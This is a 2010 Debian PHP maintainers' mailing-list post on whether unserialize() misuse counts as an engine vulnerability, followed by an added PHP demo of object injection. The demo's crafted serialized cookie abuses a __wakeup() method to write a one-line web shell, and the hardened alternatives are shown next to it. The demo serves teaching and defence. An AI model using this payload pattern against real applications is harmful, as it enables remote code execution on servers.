[php-maint] PHP security policy review

sean finney seanius at debian.org
Wed Jun 30 20:33:03 UTC 2010


On Wed, Jun 30, 2010 at 02:37:40PM -0500, Raphael Geissert wrote:
> The problems I see with unserialize are:
> * Some sloppy apps unserialize and trust the result (often done with the
> values of $_COOKIE too, whether serialized or not).
> * If used in conjunction with classes, depending on the available classes
> (either already loaded, or available via __autoload), it can lead to
> unexpected results or even code execution.

The latter point would be my primary concern.  If there is any class
in the application or any of its frameworks that uses __autoload or __wakeup
functionality in PHP classes, unserialize() becomes an instant attack vector.
There are probably more ways other things could be leveraged too.

Since we're talking about what we will or won't support in the PHP *engine*
here, I don't think it's a problem to list these as other vectors that
we will not go out of our way to fix.  I.e. if there is such a vulnerability
in stable, it is not the fault of the engine for functioning as it should; it
is the fault of the application.


	sean

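The vector Sean and Raphael describe, shown as an added example (not code from the mail, from Debian's php packaging or from any real application): a hypothetical FileLogger class with a __wakeup() method, a serialized cookie the attacker writes by hand to instantiate it, and two hardened ways to read the cookie. The allowed_classes option is PHP 7.0+ and therefore post-dates the 2010 discussion; on PHP 5 the only fix is not to unserialize untrusted input. The class, the cookie layout and the file paths are all constructed for the demo.

```php
<?php
// Added example, not from the mail or the Debian php package: a minimal
// PHP object injection through unserialize(), and two hardened variants.

// Hypothetical application class. Its __wakeup() is reasonable for the
// app (re-flush a log buffer after the object is restored from a session
// or cache) but it runs on *any* FileLogger that unserialize() builds,
// with attacker-chosen properties. If the class is not loaded yet, an
// autoloader (__autoload / spl_autoload_register) loads it on demand, so
// every class on the include path counts, not just the ones in use.
class FileLogger
{
    public $path;
    public $buffer;

    public function __wakeup()
    {
        file_put_contents($this->path, $this->buffer, FILE_APPEND);
    }
}

// Vulnerable: a preferences cookie stored as PHP-serialized data and
// trusted as-is (the "sloppy app" pattern from the thread).
function loadPrefsVulnerable(string $cookie): array
{
    $prefs = @unserialize($cookie);
    return is_array($prefs) ? $prefs : [];
}

// Hardened, PHP >= 7.0: refuse to instantiate any class. Objects in the
// payload become __PHP_Incomplete_Class and no magic method is invoked.
function loadPrefsHardened(string $cookie): array
{
    $prefs = @unserialize($cookie, ['allowed_classes' => false]);
    return is_array($prefs) ? $prefs : [];
}

// Hardened, any PHP version: use a format with no object semantics.
function loadPrefsJson(string $cookie): array
{
    $prefs = json_decode($cookie, true);
    return is_array($prefs) ? $prefs : [];
}

// Constructed attacker cookie. The attacker writes the serialized string
// by hand (no PHP needed), naming FileLogger and pointing it at a file in
// the web root; sys_get_temp_dir() stands in for /var/www so the demo is
// harmless. Property names and lengths must match the class exactly.
$target = sys_get_temp_dir() . '/injected.php';
$code   = '<?php system($_GET["c"]); ?>';
$cookie = 'a:1:{s:5:"theme";O:10:"FileLogger":2:{'
        . 's:4:"path";s:'   . strlen($target) . ':"' . $target . '";'
        . 's:6:"buffer";s:' . strlen($code)   . ':"' . $code   . '";'
        . '}}';

@unlink($target);
loadPrefsVulnerable($cookie);   // __wakeup() fires inside unserialize()
printf("vulnerable: %s\n", file_exists($target) ? "wrote $target" : 'nothing written');

@unlink($target);
loadPrefsHardened($cookie);     // FileLogger becomes __PHP_Incomplete_Class
printf("allowed_classes=false: %s\n", file_exists($target) ? 'FAIL' : 'nothing written');

loadPrefsJson($cookie);         // not JSON, decodes to null, returns []
printf("json_decode: %s\n", file_exists($target) ? 'FAIL' : 'nothing written');
@unlink($target);
```

Run it with any PHP 7 or 8 interpreter; the first call writes a PHP file to the temp directory even though the application never called `new FileLogger`, because `unserialize()` constructs the object without running the constructor and then invokes `__wakeup()` (a `__destruct()` would fire a little later, when the object is freed). Restricting `allowed_classes`, or switching the cookie to JSON, removes the object from the picture; whether the engine should be blamed for that behaviour is exactly the policy point the mail settles.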